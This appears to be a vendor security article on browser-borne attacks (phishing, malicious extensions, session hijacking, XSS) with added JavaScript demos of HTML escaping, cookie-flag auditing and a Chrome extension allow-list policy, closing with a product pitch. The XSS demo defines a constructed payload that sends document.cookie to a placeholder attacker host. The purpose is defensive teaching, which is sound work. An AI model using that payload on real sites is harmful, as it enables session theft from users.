The Browser Defense Playbook: Stopping the Attacks That Start on Your Screen
The Browser: The New Center of Work — and Risk
The predominance of cloud-based apps and the trend towards remote work have made the browser the place where most work happens. In fact, about 85% of daily work takes place there. This shift has brought numerous benefits, such as increased flexibility and the ability to work from a wider range of locations and devices, accessing full "desktops" inside a browser tab. Organizations can manage apps and browser access more efficiently, leading to greater central management, lower costs, and better flexibility.
However, this new reality also presents significant security challenges. As work migrates to the browser, so do the threats.
The Threat Landscape
In Unit 42’s 2025 Global Incident Response Report, nearly half of the incidents investigated involved malicious activity launched or facilitated through employees’ browsers. Common tactics include phishing, abuse of URL redirects, and malware downloads, each exploiting the browser session without adequate detection or blocking.
Why Browsers Fail: Common Pitfalls and Security Lapses
Despite the security measures built into popular browsers like Google Chrome, Apple Safari, Mozilla Firefox, and Microsoft Edge, attackers keep finding ways to exploit vulnerabilities in the browser and in the web apps it renders. Because these browsers come from the biggest, most trusted names in tech, organizations often treat them as the defense between the internet and the organization's infrastructure, even though a consumer browser was never designed to be an enterprise control point.
Social Engineering
Fraudulent emails, fake websites, and malicious links are the standard tools of phishing, and the pages they lead to are rendered in the browser. A successful lure harvests credentials or session cookies, or walks the user into downloading and running malware; the user did interact, but nothing on screen looked suspicious at the time, so the compromise happens without the user realizing it.
Browser Extensions
Marketplaces like the Chrome Web Store offer tens of thousands of extensions. Many of these extensions are poorly secured, and some are outright malicious. A Stanford University study of the Chrome Web Store found that, over a three-year period, roughly 280 million users installed extensions that were malicious, violated store policy, or contained known-vulnerable code.
Users on personal devices face additional risks. Personal devices often lack centralized security policies and monitoring to vet or block suspicious extension installations, making them more vulnerable to malware.
Browser-Specific Tactics
Session hijacking lets malware on the endpoint read session cookies and tokens out of the browser's profile storage and replay them, impersonating the user without ever seeing a password or MFA prompt, because authentication already happened. Cross-site scripting (XSS) lets an attacker inject script into a web app's pages so that it runs with that app's origin privileges, where it can steal the user's session, modify transactions in flight, or overlay a fake login form.
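The two halves of the XSS-to-session-theft chain, as an added example that is not part of the original article: a template that drops untrusted input straight into HTML beside its escaped form, a check that shows the injected markup would create an element the template author never wrote, and an audit of the Set-Cookie attributes that limit what a stolen session cookie is worth. The payload, the cookie headers and the attacker host are all constructed for the demo.

```javascript
// Added example, not code from the original article. All inputs are constructed.

// Vulnerable rendering: a query-string value interpolated directly into markup.
function renderGreetingVulnerable(name) {
  return `<h1>Welcome back, ${name}</h1>`;
}

// Hardened form: encode the characters that let text break out of an HTML
// text node or attribute value, so the payload is displayed, not executed.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}
function renderGreetingSafe(name) {
  return `<h1>Welcome back, ${escapeHtml(name)}</h1>`;
}

// Does the rendered markup contain a tag the template did not intend?
// A real browser would create that element and fire its event handlers.
function hasUnexpectedTag(html, allowed = ["h1"]) {
  const tags = [...html.matchAll(/<\/?([a-z][a-z0-9]*)/gi)].map((m) => m[1].toLowerCase());
  return tags.some((t) => !allowed.includes(t));
}

// Audit a Set-Cookie header for the attributes that blunt session theft:
// HttpOnly keeps document.cookie from reading the value, Secure keeps it off
// plaintext HTTP, SameSite=Lax/Strict stops most cross-site sends.
function auditSetCookie(header) {
  const [nameValue, ...attrs] = header.split(";").map((p) => p.trim());
  const name = nameValue.split("=")[0];
  const flags = new Map();
  for (const a of attrs) {
    const [k, v = ""] = a.split("=");
    flags.set(k.toLowerCase(), v.trim());
  }
  const findings = [];
  if (!flags.has("httponly")) findings.push("missing HttpOnly");
  if (!flags.has("secure")) findings.push("missing Secure");
  const sameSite = (flags.get("samesite") || "").toLowerCase();
  if (sameSite !== "lax" && sameSite !== "strict") findings.push("SameSite not Lax/Strict");
  return { name, findings };
}

// Constructed attacker input: an <img> whose onerror handler ships
// document.cookie to an attacker-controlled host (placeholder domain).
const PAYLOAD = `<img src=x onerror="fetch('https://attacker.example/?c='+document.cookie)">`;

console.log(hasUnexpectedTag(renderGreetingVulnerable(PAYLOAD)));  // true: <img> would be created
console.log(hasUnexpectedTag(renderGreetingSafe(PAYLOAD)));        // false: rendered as text
console.log(auditSetCookie("sessionid=abc123; Path=/"));
console.log(auditSetCookie("sessionid=abc123; Path=/; Secure; HttpOnly; SameSite=Lax"));
```

Escaping (or a Content Security Policy) is the primary control; the cookie attributes are damage limitation. HttpOnly stops the payload from reading the cookie, but an injected script can still issue authenticated requests from inside the page, and none of these attributes help against an infostealer that reads the cookie jar off disk, which is the session hijacking case above.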
No Clicking Necessary
The traditional advice to "don't click anything suspicious" is no longer sufficient. Malicious pages look increasingly authentic, and many attacks don't require a click at all. Simply visiting a malicious or compromised website can trigger a drive-by download that exploits a browser vulnerability and installs malware without the user's knowledge or any further interaction.
A Lack of Policy
Many organizations overlook the browser as part of the attack surface: they permit plaintext HTTP and other insecure protocols, and they keep no inventory of which extensions are permitted. This oversight leaves them exposed to a wide range of threats.
Crucial Steps Every Defender Should Take
To address these challenges, organizations should take several crucial steps:
- Control Browser Extensions: Use enterprise-grade secure browsers with strict extension allow-lists and data loss prevention capabilities.
- Implement Zero Trust: Verify user identity and control access tightly within the browser, applying the principle of least privilege to SaaS and web apps.
- Monitor and Log: Continuously monitor browser sessions for risky behavior and log everything. Perform continuous risk assessment regarding device health, user behavior, and application risk.
Zero Trust: Implementation Strategies
- Authenticate and Validate: Authenticate the user before the browser session starts, and validate the user's identity again before granting access to any web app.
- Apply Conditional Access: Use step-up MFA for sensitive user actions and tailor access rules according to context, such as device security posture, location, or network.
- Monitor and Block: Continuously monitor extensions and block them if they pose a risk. Assume all web traffic and extensions are risky and only allow vetted, enterprise-approved extensions.
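The extension controls described in both lists above (a strict allow-list with deny-by-default, plus continuous monitoring of what is actually installed), as an added example that is not part of the original article: it builds a Chrome enterprise policy from a vetted list and audits a fleet inventory against it. ExtensionInstallBlocklist, ExtensionInstallAllowlist and ExtensionInstallForcelist are real Chrome enterprise policy names; the extension IDs, names and device inventory are constructed placeholders, not real extensions.

```javascript
// Added example, not code from the original article. Extension IDs, names and
// the inventory are constructed placeholders.

// Chrome extension IDs are 32 characters drawn from the letters a-p.
const EXTENSION_ID = /^[a-p]{32}$/;

// Constructed allow-list: extensions the security team has reviewed.
// `force: true` installs the extension on every managed profile.
const APPROVED = [
  { id: "abcdefghijklmnopabcdefghijklmnop", name: "Corporate password manager", force: true },
  { id: "ponmlkjihgfedcbaponmlkjihgfedcba", name: "Approved PDF viewer", force: false },
];

// Chrome Web Store update URL used in force-list entries.
const CWS_UPDATE_URL = "https://clients2.google.com/service/update2/crx";

// Deny by default, then allow only what was vetted.
function buildChromePolicy(approved) {
  const bad = approved.filter((e) => !EXTENSION_ID.test(e.id));
  if (bad.length) {
    throw new Error(`malformed extension id(s): ${bad.map((e) => e.id).join(", ")}`);
  }
  return {
    ExtensionInstallBlocklist: ["*"],                 // "*" blocks everything not allowed below
    ExtensionInstallAllowlist: approved.map((e) => e.id),
    ExtensionInstallForcelist: approved               // "<id>;<update_url>" entries
      .filter((e) => e.force)
      .map((e) => `${e.id};${CWS_UPDATE_URL}`),
  };
}

// Monitoring side: compare what devices report as installed against the
// policy. Flags extensions outside the allow-list (policy not applied, or a
// sideloaded install) and force-installed extensions that are missing.
function auditInventory(policy, inventory) {
  const allowed = new Set(policy.ExtensionInstallAllowlist);
  const forced = new Set(policy.ExtensionInstallForcelist.map((s) => s.split(";")[0]));
  const findings = [];
  const byDevice = new Map();
  for (const row of inventory) {
    if (!byDevice.has(row.device)) byDevice.set(row.device, new Set());
    byDevice.get(row.device).add(row.id);
    if (!allowed.has(row.id)) {
      findings.push({ device: row.device, id: row.id, issue: "not on allow-list" });
    }
  }
  for (const [device, ids] of byDevice) {
    for (const id of forced) {
      if (!ids.has(id)) findings.push({ device, id, issue: "force-installed extension missing" });
    }
  }
  return findings;
}

// Constructed inventory, as an endpoint agent or browser management
// console might report it.
const INVENTORY = [
  { device: "laptop-01", id: "abcdefghijklmnopabcdefghijklmnop" },
  { device: "laptop-01", id: "ponmlkjihgfedcbaponmlkjihgfedcba" },
  { device: "laptop-02", id: "abcdefghijklmnopabcdefghijklmnop" },
  { device: "laptop-02", id: "aaaaaaaabbbbbbbbccccccccdddddddd" }, // unvetted "coupon finder"
  { device: "laptop-03", id: "ponmlkjihgfedcbaponmlkjihgfedcba" }, // password manager missing
];

const POLICY = buildChromePolicy(APPROVED);
console.log(JSON.stringify(POLICY, null, 2));
console.log(auditInventory(POLICY, INVENTORY));
```

The policy object is what you would serialize as JSON into Chrome's managed policy directory on Linux (/etc/opt/chrome/policies/managed/) or push through GPO or your MDM on other platforms. The audit is the "monitor and block" half: a device reporting an ID outside the allow-list means the policy is not being enforced there, and a missing force-installed extension means the device has drifted from the baseline.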
Finalizing Your Playbook: Achieving Superior Browser Security
Palo Alto Networks' Prisma Browser combines zero trust principles with cloud-delivered security services. Because its controls run inside the browser, it inspects traffic in real time without a TLS-decrypting proxy, and applies malware prevention, URL filtering, and data loss prevention to that traffic without a separate endpoint agent. Paired with Prisma Access, it secures access to internal applications without exposing them to the public internet, continuously authenticating and authorizing every user and device before access is granted.